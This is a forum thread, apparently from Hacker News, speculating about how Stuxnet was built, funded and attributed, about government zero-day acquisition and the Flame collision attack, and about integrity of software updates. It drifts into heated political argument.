Reverse engineer how something like this was created and it is mind boggling. The initial intelligence gathering of the target systems, developing the plan of attack, recruit experts on the siemens hardware and physicists to explain the things that could go wrong, development and QA must have been grueling, since the expense of failure is so great! Never mind the deployment and monitoring to see if it was effective! They probably recreated the entire environment to test different ways to cause havoc.
Stuxnet recorded various data points while the cascades and centrifuges operated normally, in order to replay this data to operators once the sabotage began. They must have had a working system to test this on?! The budget for something like this is probably in the tens of millions if not more. The HR requirement must have been pretty large too. Analysts to gather information, managers, programmers, qa, siemens hardware experts, physicists, deployment, monitoring, etc, etc.
> The budget for something like this is probably in the tens of millions if not more.
Absolutely. This was a massive defense spending project by any measure. How many people do you think worked on it? Assuming the project was highly compartmentalized, I would estimate that there are at least SIX subteams currently working on the next Stuxnet.
- 0-Day exploitation of PCs. How big is the team responsible for discovering / purchasing 0-day exploits?
- Hardware/firmware-level infection. This would require expert knowledge of the specific control systems.
- Networking / infrastructure. This requires an intimate knowledge of target network topology.
- Spear-phishing payload delivery. Perhaps the points of entry were several levels removed from the actual target facility (e.g., security guards' wives' laptops).
- Testing / QA.
All of this of course has to be backed up by world-class intelligence support, which I shan't address further. The technical feats of developing this alone are astounding and intriguing.
> 0-Day exploitation of PCs. How big is the team responsible for discovering / purchasing 0-day exploits?
Given the speculation that it was the US behind Stuxnet, this one is a cheap and easy one. The US has been buying up ready-made exploits for a good while now (there's a reason that the likes of Raytheon are hiring exploit devs left and right) and have nice stockpiles of them just ready and waiting for the likes of Stuxnet.
This is true because you heard it's true, or because you know it's true? Raytheon definitely has a lot of people on staff who are at least peripherally involved in vuln dev. That's not the same thing as having a staff full of exploit developers. You get peripheral involvement in vuln dev just by doing malware reversing, which is pretty low on the food chain, and something the government definitely (firsthand) spends money on.
I can also confirm that Raytheon is building up this capability (although less so than Northrop and Lockheed).
If you're curious what companies are actually committing to vulnerability dev you can search any cleared jobs site for "offensive"; the companies that have listings are who you'd imagine them to be (minus a couple placement firms that just put people right at the Fort).
At least three different people I know are significantly involved in that area. You probably know some of them too. I detest them for the ethics of it, and keep my distance as a result, but there's no question what they do and where the money comes from.
But that would still make it quite a bargain compared to buying physical weapons systems (not to mention the greater denyability / diplomatic two-steps it enables).
Exactly "tens of millions" sounds like a lot, until you realize that's not that much. Most 50 employee companies could make an investment of 10 million if they really had to.
What's going to happen when the first Chinese/North Korean/... company succeeds at actually doing this ? When will we have the first startup doing it ? Startups are known for creativity, both in technical development and interpretation of the law, so why not ?
The cost for things like this needs to go up, by a lot, fast. Or we're going to be in a deep hole.
In the David Sanger article published in the Times attributing Stuxnet to the US/Israel, this bit really struck me -
"One day, toward the end of Mr. Bush’s term, the rubble of a centrifuge was spread out on the conference table in the Situation Room, proof of the potential power of a cyberweapon. The worm was declared ready to test against the real target: Iran’s underground enrichment plant."
And i don't mean to stray off Stuxnet here, but just really quickly: The chosen-prefix collision attack used in signing the Windows Update malware (FLAME) also suspected of being from the US was a never before published variant.
The computing power alone was on the order of $200k, and makes you wonder what else the NSA or the national labs have up their sleeves.
The chosen-prefix collision attack used in signing the Windows Update malware (FLAME) also suspected of being from the US was a never before published variant.
Is anyone aware of a somewhat comprehensive auto-update cryptography survey anywhere?
I am often alarmed by the number of updates pushed through desktop software, often with little explanation. (I'm looking at you, Adobe.) .. not just for security, but for bandwidth management too.
Many open source products seem to just query a URL and direct you to go download stuff. With SSL essentially broken, that's gotta be a bit risky vs. MITM.
Gentoo for one combines pre-distributed SHA256, SHA512 and Whirlpool checksums with file size, which feels secure enough against collisions. But the pre-distribution is decentralized through potential MITM (non-trusted parties), and the cryptography around that process - if any - is less than transparent, and integrity checking is apparently not made upon locally extracted package database.
Perhaps we need a standard, cross-platform solution in the software update query space that is cryptographically paranoid and well-reviewed enough by multiple parties to be considered secure, meets the generalised need and has some OS-level integration features more advanced than "secretly do things in the background".
> Many open source products seem to just query a URL and direct you to go download stuff. With SSL essentially broken, that's gotta be a bit risky vs. MITM.
There's nothing stopping one from linking against their own copy of an SSL lib, and supplying their own list of trust anchors/trusted CAs. I've been wondering for a while why lots of apps (e.g. mobile apps) don't do this more often.
I believe the best way to do it is something like ECDSA to verify and sign update packages - but I'm not familiar enough with the crypto field to understand how the entire mechanism works.
Sure, signatures are ideal. The problem for distribution maintainers, I guess, is that really they can't sign off on things; only the actual package developers can. Further, you'd wind up providing a key distribution service which may rapidly become more complex than the software packaging itself.
Given the above, perhaps all distribution maintainers can realistically do is say "it hasn't changed since I first saw it" which is what happens when they provide multiple checksums of a file, which is probably lower CPU and software library overhead than performing a cryptographic signature check.
"Just as easily"? With what budget? The United States has a crumbling infrastructure and is a few days away from massive, across-the-board funding cuts that will touch all corners of government, including defense. Sabotage is not only the best priced solution, it's the only soultion the country can afford in the current political climate. The US is trying to wind down its wars, not start new ones.
They might also think about bombing the US because they don't want an "atheist capitalist state" to have nuclear power. This kind of non-argument can go both ways.
Only if you think that a free liberal state like the US, and a theocracy like Iran where (for instance) they hang people for being gay is in any way morally equivalent.
That's the kind of thing that ensures that an Islamic ally with the MAD principle kicks in and fights back. This is ignoring the side effect that any damaging nuke would send fallout over the entire middle east, including Israel and other allies.
I was under the impression that the US started this war with their questionable military efforts abroad?
Pretty sure the US armed a lot of the terrorists in the first place. When you suck the resources out of the world and push people into starvation whilst living in the land of plenty, you're obviously going to become a target.
There are millions of Muslims representing hundreds of view points.
"All Christians are homophobic retards." What? There's nothing wrong with that statement. It describes those Westboro morons and therefore can be extrapolated to every Christian, right?
> They must have had a working system to test this on?!
The speculation is that Stuxnet was tested on P-1 centrifuges that the US acquired when Libya dismantled its nuclear program, set up in Israel's nuclear arms facility in Dimona. [1]
Stuxnet recorded various data points while the cascades and centrifuges operated normally, in order to replay this data to operators once the sabotage began. They must have had a working system to test this on?! The budget for something like this is probably in the tens of millions if not more. The HR requirement must have been pretty large too. Analysts to gather information, managers, programmers, qa, siemens hardware experts, physicists, deployment, monitoring, etc, etc.